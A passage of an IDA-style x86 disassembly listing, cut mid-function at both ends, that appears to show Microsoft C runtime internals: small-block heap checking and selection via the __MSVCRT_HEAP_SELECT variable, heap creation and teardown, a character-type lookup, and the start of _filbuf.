add eax, [ebp+arg_8]
cmp eax, [ebp+var_14]
jnb loc_426873
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx]
test edx, edx
jnz loc_42685F
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_C], eax
mov [ebp+var_10], 1
jmp short loc_4267D0
; ---------------------------------------------------------------------------
loc_4267BE: ; CODE XREF: sub_4265D0+20B�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_4267D0: ; CODE XREF: sub_4265D0+1EC�j
mov eax, [ebp+var_C]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jnz short loc_4267DD
jmp short loc_4267BE
; ---------------------------------------------------------------------------
loc_4267DD: ; CODE XREF: sub_4265D0+209�j
mov edx, [ebp+var_10]
cmp edx, [ebp+arg_8]
jnb short loc_426802
mov eax, [ebp+arg_4]
sub eax, [ebp+var_10]
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_4267FA
xor eax, eax
jmp short loc_426875
; ---------------------------------------------------------------------------
loc_4267FA: ; CODE XREF: sub_4265D0+224�j
mov edx, [ebp+var_C]
mov [ebp+var_8], edx
jmp short loc_42685D
; ---------------------------------------------------------------------------
loc_426802: ; CODE XREF: sub_4265D0+213�j
mov eax, [ebp+var_8]
add eax, [ebp+arg_8]
cmp eax, [ebp+var_14]
jnb short loc_426826
mov ecx, [ebp+var_8]
add ecx, [ebp+arg_8]
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+var_10]
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
jmp short loc_42683B
; ---------------------------------------------------------------------------
loc_426826: ; CODE XREF: sub_4265D0+23B�j
mov edx, [ebp+arg_0]
add edx, 8
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+4], 0
loc_42683B: ; CODE XREF: sub_4265D0+254�j
mov edx, [ebp+var_8]
mov al, byte ptr [ebp+arg_8]
mov [edx], al
mov ecx, [ebp+arg_0]
add ecx, 8
mov edx, [ebp+var_8]
sub edx, ecx
shl edx, 4
mov eax, [ebp+arg_0]
lea eax, [eax+edx+100h]
jmp short loc_426875
; ---------------------------------------------------------------------------
loc_42685D: ; CODE XREF: sub_4265D0+230�j
jmp short loc_42686E
; ---------------------------------------------------------------------------
loc_42685F: ; CODE XREF: sub_4265D0+1D6�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
loc_42686E: ; CODE XREF: sub_4265D0:loc_42685D�j
jmp loc_426782
; ---------------------------------------------------------------------------
loc_426873: ; CODE XREF: sub_4265D0+1B8�j
; sub_4265D0+1C7�j
xor eax, eax
loc_426875: ; CODE XREF: sub_4265D0+88�j
; sub_4265D0+128�j ...
mov esp, ebp
pop ebp
retn
sub_4265D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426880 proc near ; CODE XREF: sub_423620+161�p
; sub_423830+2D1�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_14], 0
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
mov edx, [ebp+arg_0]
lea eax, [edx+ecx*8+18h]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_C]
jbe short loc_4268E7
mov ecx, [ebp+arg_8]
mov dl, byte ptr [ebp+arg_C]
mov [ecx], dl
mov eax, [ebp+var_C]
sub eax, [ebp+arg_C]
mov ecx, [ebp+var_4]
mov edx, [ecx]
add edx, eax
mov eax, [ebp+var_4]
mov [eax], edx
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0F1h
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
jmp loc_4269DD
; ---------------------------------------------------------------------------
loc_4268E7: ; CODE XREF: sub_426880+33�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_C]
jnb loc_4269DD
mov ecx, [ebp+arg_8]
add ecx, [ebp+arg_C]
mov edx, [ebp+arg_4]
add edx, 0F8h
cmp ecx, edx
ja loc_4269DD
mov eax, [ebp+arg_8]
add eax, [ebp+var_C]
mov [ebp+var_10], eax
mov ecx, [ebp+arg_8]
add ecx, [ebp+arg_C]
mov [ebp+var_18], ecx
jmp short loc_426927
; ---------------------------------------------------------------------------
loc_42691E: ; CODE XREF: sub_426880+BA�j
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_426927: ; CODE XREF: sub_426880+9C�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_18]
jnb short loc_42693C
mov ecx, [ebp+var_10]
xor edx, edx
mov dl, [ecx]
test edx, edx
jnz short loc_42693C
jmp short loc_42691E
; ---------------------------------------------------------------------------
loc_42693C: ; CODE XREF: sub_426880+AD�j
; sub_426880+B8�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_18]
jnz loc_4269DD
mov ecx, [ebp+arg_8]
mov dl, byte ptr [ebp+arg_C]
mov [ecx], dl
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_8]
cmp ecx, [eax]
ja short loc_4269C2
mov edx, [ebp+arg_4]
mov eax, [ebp+var_18]
cmp eax, [edx]
jbe short loc_4269C2
mov ecx, [ebp+arg_4]
add ecx, 0F8h
cmp [ebp+var_18], ecx
jnb short loc_4269AD
mov edx, [ebp+arg_4]
mov eax, [ebp+var_18]
mov [edx], eax
mov [ebp+var_8], 0
jmp short loc_426995
; ---------------------------------------------------------------------------
loc_426983: ; CODE XREF: sub_426880+120�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_426995: ; CODE XREF: sub_426880+101�j
mov eax, [ebp+var_18]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jnz short loc_4269A2
jmp short loc_426983
; ---------------------------------------------------------------------------
loc_4269A2: ; CODE XREF: sub_426880+11E�j
mov edx, [ebp+arg_4]
mov eax, [ebp+var_8]
mov [edx+4], eax
jmp short loc_4269C2
; ---------------------------------------------------------------------------
loc_4269AD: ; CODE XREF: sub_426880+F0�j
mov ecx, [ebp+arg_4]
add ecx, 8
mov edx, [ebp+arg_4]
mov [edx], ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax+4], 0
loc_4269C2: ; CODE XREF: sub_426880+D8�j
; sub_426880+E2�j ...
mov ecx, [ebp+var_C]
sub ecx, [ebp+arg_C]
mov edx, [ebp+var_4]
mov eax, [edx]
add eax, ecx
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_4269DD: ; CODE XREF: sub_426880+62�j
; sub_426880+6D�j ...
mov eax, [ebp+var_14]
mov esp, ebp
pop ebp
retn
sub_426880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4269F0 proc near ; CODE XREF: sub_423E20+89�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
mov [ebp+var_8], 0
mov [ebp+var_1C], offset off_451BB8
loc_426A04: ; CODE XREF: sub_4269F0+21E�j
mov eax, ds:off_453BD8
cmp eax, [ebp+var_1C]
jnz short loc_426A17
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_426A17: ; CODE XREF: sub_4269F0+1C�j
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz loc_426BFF
mov [ebp+var_C], 0
mov [ebp+var_28], 0
mov ecx, [ebp+var_1C]
mov edx, [ecx+10h]
mov [ebp+var_4], edx
jmp short loc_426A58
; ---------------------------------------------------------------------------
loc_426A43: ; CODE XREF: sub_4269F0:loc_426BFA�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1000h
mov [ebp+var_4], ecx
loc_426A58: ; CODE XREF: sub_4269F0+51�j
cmp [ebp+var_C], 400h
jge loc_426BFF
mov edx, [ebp+var_C]
mov eax, [ebp+var_1C]
cmp dword ptr [eax+edx*8+18h], 0FFFFFFFFh
jnz short loc_426AA0
cmp [ebp+var_28], 0
jnz short loc_426A92
mov ecx, [ebp+var_C]
mov edx, [ebp+var_1C]
lea eax, [edx+ecx*8+18h]
mov ecx, [ebp+var_1C]
cmp [ecx+0Ch], eax
jz short loc_426A92
or eax, 0FFFFFFFFh
jmp loc_426C23
; ---------------------------------------------------------------------------
loc_426A92: ; CODE XREF: sub_4269F0+86�j
; sub_4269F0+98�j
mov edx, [ebp+var_28]
add edx, 1
mov [ebp+var_28], edx
jmp loc_426BFA
; ---------------------------------------------------------------------------
loc_426AA0: ; CODE XREF: sub_4269F0+80�j
mov eax, [ebp+var_4]
add eax, 0F8h
mov ecx, [ebp+var_4]
cmp [ecx], eax
jb short loc_426AB9
mov eax, 0FFFFFFFEh
jmp loc_426C23
; ---------------------------------------------------------------------------
loc_426AB9: ; CODE XREF: sub_4269F0+BD�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx+0F8h]
cmp eax, 0FFh
jz short loc_426AD5
mov eax, 0FFFFFFFDh
jmp loc_426C23
; ---------------------------------------------------------------------------
loc_426AD5: ; CODE XREF: sub_4269F0+D9�j
mov [ebp+var_10], 0
mov [ebp+var_18], 0
mov [ebp+var_24], 0
mov [ebp+var_20], 0
loc_426AF1: ; CODE XREF: sub_4269F0:loc_426BD2�j
cmp [ebp+var_10], 0F0h
jge loc_426BD7
mov ecx, [ebp+var_10]
mov edx, [ebp+var_4]
lea eax, [edx+ecx+8]
mov ecx, [ebp+var_4]
cmp eax, [ecx]
jnz short loc_426B18
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_426B18: ; CODE XREF: sub_4269F0+11D�j
mov eax, [ebp+var_4]
add eax, [ebp+var_10]
xor ecx, ecx
mov cl, [eax+8]
test ecx, ecx
jnz short loc_426B47
mov edx, [ebp+var_24]
add edx, 1
mov [ebp+var_24], edx
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
jmp loc_426BD2
; ---------------------------------------------------------------------------
loc_426B47: ; CODE XREF: sub_4269F0+135�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
cmp ecx, [eax+edx*8+1Ch]
jl short loc_426B60
mov eax, 0FFFFFFFCh
jmp loc_426C23
; ---------------------------------------------------------------------------
loc_426B60: ; CODE XREF: sub_4269F0+164�j
cmp [ebp+var_18], 1
jnz short loc_426B84
mov edx, [ebp+var_4]
mov eax, [ebp+var_20]
cmp eax, [edx+4]
jge short loc_426B7B
mov eax, 0FFFFFFFBh
jmp loc_426C23
; ---------------------------------------------------------------------------
loc_426B7B: ; CODE XREF: sub_4269F0+17F�j
mov ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_18], ecx
loc_426B84: ; CODE XREF: sub_4269F0+174�j
mov [ebp+var_20], 0
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_14], edx
jmp short loc_426B9F
; ---------------------------------------------------------------------------
loc_426B96: ; CODE XREF: sub_4269F0:loc_426BCA�j
mov eax, [ebp+var_14]
add eax, 1
mov [ebp+var_14], eax
loc_426B9F: ; CODE XREF: sub_4269F0+1A4�j
mov ecx, [ebp+var_4]
add ecx, [ebp+var_10]
xor edx, edx
mov dl, [ecx+8]
mov eax, [ebp+var_10]
add eax, edx
cmp [ebp+var_14], eax
jge short loc_426BCC
mov ecx, [ebp+var_4]
add ecx, [ebp+var_14]
xor edx, edx
mov dl, [ecx+8]
test edx, edx
jz short loc_426BCA
mov eax, 0FFFFFFFAh
jmp short loc_426C23
; ---------------------------------------------------------------------------
loc_426BCA: ; CODE XREF: sub_4269F0+1D1�j
jmp short loc_426B96
; ---------------------------------------------------------------------------
loc_426BCC: ; CODE XREF: sub_4269F0+1C2�j
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
loc_426BD2: ; CODE XREF: sub_4269F0+152�j
jmp loc_426AF1
; ---------------------------------------------------------------------------
loc_426BD7: ; CODE XREF: sub_4269F0+108�j
mov ecx, [ebp+var_C]
mov edx, [ebp+var_1C]
mov eax, [ebp+var_24]
cmp eax, [edx+ecx*8+18h]
jz short loc_426BED
mov eax, 0FFFFFFF9h
jmp short loc_426C23
; ---------------------------------------------------------------------------
loc_426BED: ; CODE XREF: sub_4269F0+1F4�j
cmp [ebp+var_18], 0
jnz short loc_426BFA
mov eax, 0FFFFFFF8h
jmp short loc_426C23
; ---------------------------------------------------------------------------
loc_426BFA: ; CODE XREF: sub_4269F0+AB�j
; sub_4269F0+201�j
jmp loc_426A43
; ---------------------------------------------------------------------------
loc_426BFF: ; CODE XREF: sub_4269F0+34�j
; sub_4269F0+6F�j
mov ecx, [ebp+var_1C]
mov edx, [ecx]
mov [ebp+var_1C], edx
cmp [ebp+var_1C], offset off_451BB8
jnz loc_426A04
cmp [ebp+var_8], 0
jnz short loc_426C21
mov eax, 0FFFFFFF7h
jmp short loc_426C23
; ---------------------------------------------------------------------------
loc_426C21: ; CODE XREF: sub_4269F0+228�j
xor eax, eax
loc_426C23: ; CODE XREF: sub_4269F0+9D�j
; sub_4269F0+C4�j ...
mov esp, ebp
pop ebp
retn
sub_4269F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426C30 proc near ; CODE XREF: _0:00423FF2�p
; sub_426C90+1FB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov dword ptr [eax], 0
push 0
call ds:off_4F5370
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
cmp edx, 5A4Dh
jnz short loc_426C63
mov eax, [ebp+var_8]
cmp dword ptr [eax+3Ch], 0
jnz short loc_426C65
loc_426C63: ; CODE XREF: sub_426C30+28�j
jmp short loc_426C88
; ---------------------------------------------------------------------------
loc_426C65: ; CODE XREF: sub_426C30+31�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
add edx, [ecx+3Ch]
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dl, [ecx+1Ah]
mov [eax], dl
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dl, [ecx+1Bh]
mov [eax+1], dl
loc_426C88: ; CODE XREF: sub_426C30:loc_426C63�j
mov esp, ebp
pop ebp
retn
sub_426C30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426C90 proc near ; CODE XREF: sub_426EC0:loc_426EEC�p
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_1230 = dword ptr -1230h
var_122C = byte ptr -122Ch
var_1128 = byte ptr -1128h
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1238h
call sub_41EF80
mov [ebp+var_1238], 0
mov [ebp+var_98], 94h
lea eax, [ebp+var_98]
push eax
call ds:dword_4F539C ; GetVersionExA
test eax, eax
jz short loc_426CDE
cmp [ebp+var_88], 2
jnz short loc_426CDE
cmp [ebp+var_94], 5
jb short loc_426CDE
mov eax, 1
jmp loc_426EB0
; ---------------------------------------------------------------------------
loc_426CDE: ; CODE XREF: sub_426C90+30�j
; sub_426C90+39�j ...
push 1090h
lea ecx, [ebp+var_1128]
push ecx
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4F54B8 ; GetEnvironmentVariableA
test eax, eax
jz loc_426E84
lea edx, [ebp+var_1128]
mov [ebp+var_4], edx
jmp short loc_426D11
; ---------------------------------------------------------------------------
loc_426D08: ; CODE XREF: sub_426C90:loc_426D3E�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_426D11: ; CODE XREF: sub_426C90+76�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_426D40
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 61h
jl short loc_426D3E
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 7Ah
jg short loc_426D3E
mov ecx, [ebp+var_4]
mov dl, [ecx]
add dl, 0E0h
mov eax, [ebp+var_4]
mov [eax], dl
loc_426D3E: ; CODE XREF: sub_426C90+94�j
; sub_426C90+9F�j
jmp short loc_426D08
; ---------------------------------------------------------------------------
loc_426D40: ; CODE XREF: sub_426C90+89�j
push 16h
lea ecx, [ebp+var_1128]
push ecx
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_41F5E0
add esp, 0Ch
test eax, eax
jnz short loc_426D68
lea edx, [ebp+var_1128]
mov [ebp+var_1238], edx
jmp short loc_426DDB
; ---------------------------------------------------------------------------
loc_426D68: ; CODE XREF: sub_426C90+C8�j
push 104h
lea eax, [ebp+var_122C]
push eax
push 0
call ds:off_4F5344
lea ecx, [ebp+var_122C]
mov [ebp+var_4], ecx
jmp short loc_426D90
; ---------------------------------------------------------------------------
loc_426D87: ; CODE XREF: sub_426C90:loc_426DBD�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_426D90: ; CODE XREF: sub_426C90+F5�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_426DBF
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 61h
jl short loc_426DBD
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 7Ah
jg short loc_426DBD
mov eax, [ebp+var_4]
mov cl, [eax]
add cl, 0E0h
mov edx, [ebp+var_4]
mov [edx], cl
loc_426DBD: ; CODE XREF: sub_426C90+113�j
; sub_426C90+11E�j
jmp short loc_426D87
; ---------------------------------------------------------------------------
loc_426DBF: ; CODE XREF: sub_426C90+108�j
lea eax, [ebp+var_122C]
push eax
lea ecx, [ebp+var_1128]
push ecx
call sub_41EBB0
add esp, 8
mov [ebp+var_1238], eax
loc_426DDB: ; CODE XREF: sub_426C90+D6�j
cmp [ebp+var_1238], 0
jz loc_426E84
push 2Ch
mov edx, [ebp+var_1238]
push edx
call sub_41F720
add esp, 8
mov [ebp+var_1238], eax
cmp [ebp+var_1238], 0
jz short loc_426E84
mov eax, [ebp+var_1238]
add eax, 1
mov [ebp+var_1238], eax
mov ecx, [ebp+var_1238]
mov [ebp+var_4], ecx
loc_426E20: ; CODE XREF: sub_426C90:loc_426E46�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_426E48
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_426E3D
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
jmp short loc_426E46
; ---------------------------------------------------------------------------
loc_426E3D: ; CODE XREF: sub_426C90+1A3�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_426E46: ; CODE XREF: sub_426C90+1AB�j
jmp short loc_426E20
; ---------------------------------------------------------------------------
loc_426E48: ; CODE XREF: sub_426C90+198�j
push 0Ah
push 0
mov edx, [ebp+var_1238]
push edx
call sub_41F0F0
add esp, 0Ch
mov [ebp+var_1230], eax
cmp [ebp+var_1230], 2
jz short loc_426E7C
cmp [ebp+var_1230], 3
jz short loc_426E7C
cmp [ebp+var_1230], 1
jnz short loc_426E84
loc_426E7C: ; CODE XREF: sub_426C90+1D8�j
; sub_426C90+1E1�j
mov eax, [ebp+var_1230]
jmp short loc_426EB0
; ---------------------------------------------------------------------------
loc_426E84: ; CODE XREF: sub_426C90+67�j
; sub_426C90+152�j ...
lea eax, [ebp+var_1234]
push eax
call sub_426C30
add esp, 4
mov ecx, [ebp+var_1234]
and ecx, 0FFh
cmp ecx, 6
jl short loc_426EAB
mov eax, 3
jmp short loc_426EB0
; ---------------------------------------------------------------------------
loc_426EAB: ; CODE XREF: sub_426C90+212�j
mov eax, 2
loc_426EB0: ; CODE XREF: sub_426C90+49�j
; sub_426C90+1F2�j ...
mov esp, ebp
pop ebp
retn
sub_426C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426EC0 proc near ; CODE XREF: _0:0042217E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 1000h
xor eax, eax
cmp [ebp+arg_0], 0
setz al
push eax
call ds:dword_4F54C0 ; HeapCreate
mov ds:dword_4F39E8, eax
cmp ds:dword_4F39E8, 0
jnz short loc_426EEC
xor eax, eax
jmp short loc_426F4B
; ---------------------------------------------------------------------------
loc_426EEC: ; CODE XREF: sub_426EC0+26�j
call sub_426C90
mov ds:dword_4F39EC, eax
cmp ds:dword_4F39EC, 3
jnz short loc_426F23
push 3F8h
call sub_424080
add esp, 4
test eax, eax
jnz short loc_426F21
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F54BC ; HeapDestroy
xor eax, eax
jmp short loc_426F4B
; ---------------------------------------------------------------------------
loc_426F21: ; CODE XREF: sub_426EC0+4E�j
jmp short loc_426F46
; ---------------------------------------------------------------------------
loc_426F23: ; CODE XREF: sub_426EC0+3D�j
cmp ds:dword_4F39EC, 2
jnz short loc_426F46
call sub_425D50
test eax, eax
jnz short loc_426F46
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F54BC ; HeapDestroy
xor eax, eax
jmp short loc_426F4B
; ---------------------------------------------------------------------------
loc_426F46: ; CODE XREF: sub_426EC0:loc_426F21�j
; sub_426EC0+6A�j ...
mov eax, 1
loc_426F4B: ; CODE XREF: sub_426EC0+2A�j
; sub_426EC0+5F�j ...
pop ebp
retn
sub_426EC0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp ds:dword_4F39EC, 3
jnz loc_426FEA
mov eax, ds:dword_4F3A08
mov [ebp-8], eax
mov dword ptr [ebp-4], 0
jmp short loc_426F7D
; ---------------------------------------------------------------------------
loc_426F74: ; CODE XREF: _0:00426FD1�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_426F7D: ; CODE XREF: _0:00426F72�j
mov edx, [ebp-4]
cmp edx, ds:dword_4F3A04
jge short loc_426FD3
push 4000h
push 100000h
mov eax, [ebp-8]
mov ecx, [eax+0Ch]
push ecx
call ds:dword_4F54B0 ; VirtualFree
push 8000h
push 0
mov edx, [ebp-8]
mov eax, [edx+0Ch]
push eax
call ds:dword_4F54B0 ; VirtualFree
mov ecx, [ebp-8]
mov edx, [ecx+10h]
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov ecx, [ebp-8]
add ecx, 14h
mov [ebp-8], ecx
jmp short loc_426F74
; ---------------------------------------------------------------------------
loc_426FD3: ; CODE XREF: _0:00426F86�j
mov edx, ds:dword_4F3A08
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5414 ; RtlFreeHeap
jmp short loc_427028
; ---------------------------------------------------------------------------
loc_426FEA: ; CODE XREF: _0:00426F5D�j
cmp ds:dword_4F39EC, 2
jnz short loc_427028
mov dword ptr [ebp-0Ch], offset off_451BB8
loc_426FFA: ; CODE XREF: _0:00427026�j
mov ecx, [ebp-0Ch]
cmp dword ptr [ecx+10h], 0
jz short loc_427017
push 8000h
push 0
mov edx, [ebp-0Ch]
mov eax, [edx+10h]
push eax
call ds:dword_4F54B0 ; VirtualFree
loc_427017: ; CODE XREF: _0:00427001�j
mov ecx, [ebp-0Ch]
mov edx, [ecx]
mov [ebp-0Ch], edx
cmp dword ptr [ebp-0Ch], offset off_451BB8
jnz short loc_426FFA
loc_427028: ; CODE XREF: _0:00426FE8�j _0:00426FF1�j
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F54BC ; HeapDestroy
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427040 proc near ; CODE XREF: sub_41DF10+66�p
; sub_41E610+19�p ...
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 1
cmp eax, 100h
ja short loc_42706A
mov ecx, [ebp+arg_0]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, [ebp+arg_4]
jmp loc_4270F3
; ---------------------------------------------------------------------------
loc_42706A: ; CODE XREF: sub_427040+11�j
mov ecx, [ebp+arg_0]
sar ecx, 8
and ecx, 0FFh
and ecx, 0FFh
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8000h
test eax, eax
jz short loc_4270B3
mov ecx, [ebp+arg_0]
sar ecx, 8
and ecx, 0FFh
mov [ebp+var_C], cl
mov dl, byte ptr [ebp+arg_0]
mov [ebp+var_B], dl
mov [ebp+var_A], 0
mov [ebp+var_8], 2
jmp short loc_4270C4
; ---------------------------------------------------------------------------
loc_4270B3: ; CODE XREF: sub_427040+4F�j
mov al, byte ptr [ebp+arg_0]
mov [ebp+var_C], al
mov [ebp+var_B], 0
mov [ebp+var_8], 1
loc_4270C4: ; CODE XREF: sub_427040+71�j
push 1
push 0
push 0
lea ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
push edx
lea eax, [ebp+var_C]
push eax
push 1
call sub_431210
add esp, 1Ch
test eax, eax
jnz short loc_4270E8
xor eax, eax
jmp short loc_4270F3
; ---------------------------------------------------------------------------
loc_4270E8: ; CODE XREF: sub_427040+A2�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
and eax, [ebp+arg_4]
loc_4270F3: ; CODE XREF: sub_427040+25�j
; sub_427040+A6�j
mov esp, ebp
pop ebp
retn
sub_427040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427100 proc near ; CODE XREF: sub_41E1C0+182�p
; sub_41EFB0+D7�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
loc_427109: ; CODE XREF: sub_427100+31�j
cmp [ebp+arg_0], 0
jnz short loc_42712D
push offset dword_43C514
push 0
push 69h
push offset a_filbuf_c ; "_filbuf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42712D
int 3 ; Trap to Debugger
loc_42712D: ; CODE XREF: sub_427100+D�j
; sub_427100+2A�j
xor eax, eax
test eax, eax
jnz short loc_427109
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_427155
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 40h
test edx, edx
jz short loc_42715D
loc_427155: ; CODE XREF: sub_427100+46�j
or eax, 0FFFFFFFFh
jmp loc_4272DD
; ---------------------------------------------------------------------------
loc_42715D: ; CODE XREF: sub_427100+53�j
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 2
test ecx, ecx
jz short loc_427180
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
or al, 20h
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
or eax, 0FFFFFFFFh
jmp loc_4272DD
; ---------------------------------------------------------------------------
loc_427180: ; CODE XREF: sub_427100+68�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
or al, 1
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 10Ch
test eax, eax
jnz short loc_4271AB
mov ecx, [ebp+var_4]
push ecx
call sub_4313D0
add esp, 4
jmp short loc_4271B6
; ---------------------------------------------------------------------------
loc_4271AB: ; CODE XREF: sub_427100+9B�j
mov edx, [ebp+var_4]
mov eax, [ebp+var_4]
mov ecx, [eax+8]
mov [edx], ecx
loc_4271B6: ; CODE XREF: sub_427100+A9�j
mov edx, [ebp+var_4]
mov eax, [edx+18h]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
call sub_4272F0
add esp, 0Ch
mov edx, [ebp+var_4]
mov [edx+4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
